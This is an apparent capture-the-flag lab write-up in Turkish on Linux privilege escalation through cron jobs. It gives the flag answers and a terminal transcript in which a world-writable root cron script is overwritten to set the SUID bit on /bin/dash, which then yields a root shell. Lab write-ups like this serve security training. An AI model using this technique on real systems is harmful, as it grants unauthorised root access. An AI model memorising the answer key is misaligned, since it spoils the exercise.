# Privilege Escalation 2 - Cronjobs

**Açıklama**:

CronJobs'dan faydalanarak yetkinizi yükseltin ve sistemi ele geçirin.

**Amaç**:

- Yetki Yükseltmek
- /flag.txt'i okumak

**Flags**:
- CronJob?
    - answer: **/tmp/cleanup.sh**
- flag.txt?
    - answer: **CyberPath{xhrPAVhqsBM43jbh}**

## **Solution**:

```bash
victim@ubuntu:~$ uname -a
Linux ubuntu 5.13.0-1022-aws #24~20.04.1-Ubuntu SMP Thu Apr 7 22:10:15 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
victim@ubuntu:~$ ls -la
total 24
drwxr-xr-x 1 victim victim 4096 May  2 10:59 .
drwxr-xr-x 1 root   root   4096 May  2 10:58 ..
-rw-r--r-- 1 victim victim  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 victim victim 3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 victim victim  807 Feb 25  2020 .profile
-rw-r--r-- 1 victim victim    0 May  2 10:59 .sudo_as_admin_successful
victim@ubuntu:~$ sudo -l
[sudo] password for victim: 
victim@ubuntu:~$ crontab -l
no crontab for victim
victim@ubuntu:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
*/1 *   * * *   root    /tmp/cleanup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
victim@ubuntu:~$ cat /tmp/cleanup.sh 
#!/bin/sh

rm -r /root/.bash_historyvictim@ubuntu:~$    
victim@ubuntu:~$ nano /tmp/cleanup.sh 
victim@ubuntu:~$ nano /tmp/cleanup.sh 
victim@ubuntu:~$ cat /tmp/cleanup.sh 
#!/bin/sh

chmod u+s /bin/dash

victim@ubuntu:~$ date
Mon May  2 11:00:20 UTC 2022
victim@ubuntu:~$ /bin/dash -p
# id
uid=1000(victim) gid=1000(victim) euid=0(root) groups=1000(victim),27(sudo)
# whoami
root
victim@ubuntu:~$ /bin/dash -p
# cat /flag.txt
CyberPath{flag}
```